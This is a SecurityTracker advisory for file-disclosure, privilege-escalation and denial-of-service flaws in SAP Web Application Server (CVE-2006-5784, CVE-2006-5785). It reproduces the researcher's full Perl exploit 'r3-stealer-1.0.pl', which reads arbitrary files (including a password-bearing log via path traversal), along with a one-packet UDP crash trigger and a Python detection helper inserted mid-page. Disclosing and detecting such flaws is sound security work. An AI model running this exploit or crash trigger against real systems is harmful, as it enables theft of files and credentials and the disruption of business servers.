SecurityTracker.com

SecurityTracker
Archives

Category:  Application (Web Server/CGI) > SAP Web Application Server
Vendors:  SAP
SAP Web Application Server Lets Remote Users Traverse the Directory and Deny Service
SecurityTracker Alert ID:  1017628
SecurityTracker URL:  http://securitytracker.com/id/1017628
CVE Reference:  CVE-2006-5784, CVE-2006-5785
Date:  Feb 12 2007
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, User access via local system
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 6.40 < patch 136, 7.00 < patch 66
Description:   Several vulnerabilities were reported in SAP Web Application Server. A remote user can cause denial of service conditions. A remote user can view files on the target system. A local user can gain elevated privileges.

A remote user can supply a specially crafted request to view files on the target system with the privileges of the target service [CVE-2006-5784]. On Windows-based systems, the service runs with the privileges of the 'SAPServiceJ2E' account, which is a member of the local administrator group.

A local user can exploit the file disclosure vulnerability to reach a user-controlled process via a named pipe, impersonate the SAPServiceJ2E account, and gain the privileges of that account. Windows 2000 prior to SP4, Windows XP prior to SP2, and Windows NT are affected by this privilege escalation vulnerability.

A remote user can send the string "\x72\xfe" to UDP port 64999 to cause the 'enserver.exe' process to crash [CVE-2006-5785].

A demonstration exploit is available at:

http://security.nnov.ru/files/tac0tac0.c

Nicob reported these vulnerabilities.

Impact:   A remote user can cause denial of service conditions.

A remote user can view files on the target system.

A local user can gain SAPServiceJ2E user privileges.

Solution:   The vendor has issued fixed versions (6.40 patch 136 or higher, 7.00 patch 66 or higher). The patch levels refer to the enqueue server.
Vendor URL:  www.sap.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
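As an added example (not part of the advisory, and not Nicob's or SAP's code), the following Python helpers flag the two network-level triggers described above on sample packet records and check a reported enqueue-server patch level against the fixed levels. The record layout and the sample payloads are constructed for illustration; the ports and byte markers (UDP/64999 with "\x72\xfe", TCP/3200+SYSNR, the "#EAE"/"#EAD" markers) are those given on this page.

```python
import re
import string

# Bytes we accept as part of a requested file name (printable, incl. space).
PRINTABLE = set(string.printable.encode()) - set(b"\r\n\t\x0b\x0c")
# Traversal, drive-letter, UNC or rooted paths: the forms the advisory names.
SUSPECT_PATH = re.compile(rb"(\.\.[\\/])|(^[A-Za-z]:[\\/])|(^\\\\)|(^/)")


def is_vulnerable_patch(version, patch):
    """Enqueue-server patch level below the fixed level given in the advisory.
    Only the two versions the advisory covers are known here."""
    fixed = {"6.40": 136, "7.00": 66}
    return version in fixed and patch < fixed[version]


def requested_path(payload):
    """Extract the file name from a request carrying the '#EAE ... <name>\\0\\0#EAD'
    layout seen in the attached script; None if the layout is absent."""
    end = payload.rfind(b"\x00\x00#EAD")
    if end < 0 or b"#EAE" not in payload[:end]:
        return None
    start = end
    while start > 0 and payload[start - 1] in PRINTABLE:
        start -= 1
    return payload[start:end] or None


def classify(rec):
    """rec = {'proto', 'dport', 'payload'} (constructed layout, not a pcap API).
    Returns a finding label or None."""
    if rec["proto"] == "udp" and rec["dport"] == 64999 and rec["payload"] == b"\x72\xfe":
        return "CVE-2006-5785 enserver.exe crash trigger"
    if rec["proto"] == "tcp" and 3200 <= rec["dport"] <= 3299:  # TCP/3200+SYSNR
        name = requested_path(rec["payload"])
        if name and SUSPECT_PATH.search(name):
            return "CVE-2006-5784 file read attempt: " + name.decode("latin-1")
    return None


# Constructed sample records, not captured traffic.
SAMPLES = [
    {"proto": "udp", "dport": 64999, "payload": b"\x72\xfe"},
    {"proto": "tcp", "dport": 3201,
     "payload": b"#EAE" + b"\x00" * 26 + b"..\\..\\boot.ini" + b"\x00\x00#EAD"},
    {"proto": "tcp", "dport": 3201,
     "payload": b"#EAE" + b"\x00" * 26 + b"\\\\10.11.12.13\\share\\image.jpg" + b"\x00\x00#EAD"},
    {"proto": "tcp", "dport": 3201, "payload": b"#EAE" + b"\x00" * 26 + b"ENQ_OK"},
]
```

Running `classify` over each entry of `SAMPLES` yields a finding for the first three records and None for the benign fourth.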

Message History:   None.


Source Message Contents

Subject:  Multiple vulnerabilities in SAP WebAS 6.40 and 7.00 (technical details)



 
       Multiple vulnerabilities in SAP Web Application Server
                        Technical details


Application : SAP Web AS 6.40 < patch 136 and 7.00 < patch 66
Platform : All platforms (except the third vulnerability)
Impacts : Remote file disclosure, remote DoS, local privilege escalation
Release Date : 8 February 2007
Author : Nicob <nicob at nicob.net>

Vulnerabilities technical details :
===================================

1) A remote file disclosure vulnerability allows reading any file to
which the user that the SAP Web Application Server is running as has
access. Under Windows, the service runs by default under the
SAPServiceJ2E account. This account is a member of the local administrator
group.

Exploit : use "r3-stealer-1.0.pl" (attached)

Note : Absolute paths can be used, so "C:\boot.ini" and
"\\10.11.12.13\share\image.jpg" are both OK.

2) A remote denial of service allows crashing the enserver.exe process.

Exploit : send "\x72\xfe" on port UDP/64999

3) A local privilege escalation vulnerability allows any local user to
use the file disclosure vulnerability to access a user-controlled
process via a named pipe and impersonate the user SAPServiceJ2E. The
exploitation is possible only on Windows 2000 pre-SP4, Windows XP
pre-SP2 and Windows NT.

Exploit : use "r3-stealer-1.0.pl" (attached) and "tac0tac0.c" [1]

Solutions :
===========

Apply patch 136 or newer for version 6.40
Apply patch 66 or newer for version 7.00

Note : the mentioned patch level refers to the enqueue server
More details can be found in SAP notes 948457 and 959877

[1] : http://security.nnov.ru/files/tac0tac0.c

Nicob

Attachment: r3-stealer-1.0.pl (application/x-perl)

#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Example : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
## File parameter :
##	C:\boot.ini
## 	\\10.11.12.13\share\image.jpg
##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 <ip> <port> <remote filename> (<local filename>)\n";}
my $host=$ARGV[0]; 
my $port=$ARGV[1]; 
my $filename=$ARGV[2]; 
my $output=$ARGV[3]; 

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "#####################################################################\n";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "#####################################################################\n\n";

# Define the packets

my $packet1 =
	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
	"00000000020000003b0000000500000002000000060000000400000001";						# Static

my $packet2 =
	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
		|| die "Connection refused at [$host:$port]";

# Send the two packets

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
	print "File received !\n";
	if ((!defined($output)) or ($output eq "")) {
		print "\n===========================================\n";
		print $2;
		print "\n===========================================\n";
	} else {
		open(OUT, "> $output") || die "Can't open $output ($0)";
		print "File saved as '$output'\n";
		print OUT $2;
		close(OUT);
	}
} else {
	print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;





Copyright 2020, SecurityGlobal.net LLC